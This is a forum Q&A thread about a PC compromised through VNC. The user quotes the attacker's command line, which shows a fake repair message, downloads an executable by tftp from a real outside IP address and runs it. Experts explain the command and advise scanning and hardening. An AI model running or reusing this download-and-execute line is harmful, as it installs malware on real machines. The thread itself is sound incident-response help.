?
Solved

What is this cmdline attempting to do ?

Posted on 2007-11-27
8
Medium Priority
?
304 Views
Last Modified: 2013-11-16
Hi,

We recently had a PC hacked via Real VNC. The Hacker executed the following command line.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&

Can anyone explain what this has done ?

Regards

Rob
0
Comment
Question by:ertnev74
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
8 Comments
 
LVL 40

Accepted Solution

by:
Richard Quadling earned 1400 total points
ID: 20357105
%comspec%

This is telling the computer to run the command shell as identified by %COMSPEC%

At the dos prompt type SET and enter and you will see COMSPEC.
Normally cmd.exe or (older windows) command.com


/c

Tells the comspec to run a command and then quit.


echo Repairing user32.dll

Output to the screen.

&
echo Please wait...

output to the screen.



tftp -i 81.88.110.178 GET cffhvvct.exe

Use the program tftp to get a file called cffhvvct.exe from the IP address of 81.88.110.178


start cffhvvct

Run the program just downloaded.




If you don't know the name of the program or the FTP site, don't run it.

I've just tried downloading the file from that site but it timedout.

If it was a virus, then the site may have been blocked or something else.
0
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 400 total points
ID: 20357113
Dear ertnev74,

Few weeks ago I got the same issue via VNC, it basically tries to dump 1.exe or 2.exe which is trojen. Basically search computer for virus and try to search 1.exe

U can manually end the process and renamed it and later delete it

Run the good antivirus softwares like Window Live Care or E-Wido

Read some more info
http://en.wikipedia.org/wiki/ComSpec
http://www.liutilities.com/products/wintaskspro/processlibrary/1/
0
 
LVL 40

Assisted Solution

by:Richard Quadling
Richard Quadling earned 1400 total points
ID: 20357123
OK. Having read the question again.

Without having access to the program itself, absolutely ANYTHING could have happened.

I would STRONGLY recommend disconnecting the pc from the lan and running virus scanners and rootkit scanners.

SystemInternals Process Explorer (to see what is currently running and make sure YOU know it should be running).
SystemInternals RootKitRevealer (to see if any root kits exist).
SystemInternals AutoRuns (to see what is launched when the computer is turned on or when you login).
HijackThis is a similar program to AutoRuns, but produces a report which others can look at (http://www.spywareinfo.com/~merijn/programs.php)
0
Put Machine Learning to Work--Protect Your Clients

Machine learning means Smarter Cybersecurity™ Solutions.
As technology continues to advance, managing and analyzing massive data sets just can’t be accomplished by humans alone. It requires huge amounts of memory and storage, as well as high-speed processing of the cloud.

 
LVL 47

Assisted Solution

by:rpggamergirl
rpggamergirl earned 200 total points
ID: 20357538
You could also try running some free scanners.
SUPERAntispyware:
http://www.superantispyware.com/

Download and install DrWebCureIt
http://www.freedrweb.com/

AVG Antispyware,
http://free.grisoft.com/doc/download-free-anti-spyware/us/frt/0


OR, run Combofix and upload the log for us to check.
Download ComboFix to your Desktop, from either of these locations:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Double click "combofix.exe" and follow the prompts.
When finished, it shall produce a log for you.
Upload the log at EE-Stuff.com for us to check please.
0
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 400 total points
ID: 20357582
Sorry forgot to mentioned, always make sure that your firewall is turned on.
Or VNC Should be only enable as and when required.
If you can change the default port i.e. 5900 to some other ports would be helpful too, as this port is well known by hackers, so they just scan the port and enter into it.
I need this same thing with our guys and it solved my problem.

Now since the program has been executed on your machine, so better virus/spyware/trojen scan and then do the needful as above.
0
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20357691
So what the problem? Were you able to find out 1.exe ?
0
 

Author Comment

by:ertnev74
ID: 20358036
All, thanks for you assistance with this query.

The user saw some activity on his screen last Thursday around midday. I advised him to shut off his router. When I got to his PC he explained what he had seen. Clicking on Start > Run I found the above cmdline.  

I looked up 'VNC being hacked' on EE and found a few solutions to recitify the situation. Once I made the box secure running Spyware / AV / Process Scanners I then looked at the cause and possible damage.
The cmdline was the only thing I didn't understand.... but I do now :)

The AV Scan removed a few trojans and viruses so I'm not to sure if 1.exe was on the box, however I was able to trace the IP of the hacker back to America.

Thanks again.
0
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20359640
Thanks for the valuable feedback. The best is to make your windows firewall ON and keeps on Windows Patched !!!!
0

Featured Post

Get 15 Days FREE Full-Featured Trial

Benefit from a mission critical IT monitoring with Monitis Premium or get it FREE for your entry level monitoring needs.
-Over 200,000 users
-More than 300,000 websites monitored
-Used in 197 countries
-Recommended by 98% of users

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

One of the biggest threats facing all high-value targets are APT's.  These threats include sophisticated tactics that "often starts with mapping human organization and collecting intelligence on employees, who are nowadays a weaker link than network…
Make the most of your online learning experience.
With the power of JIRA, there's an unlimited number of ways you can customize it, use it and benefit from it. With that in mind, there's bound to be things that I wasn't able to cover in this course. With this summary we'll look at some places to go…
Simple Linear Regression

752 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question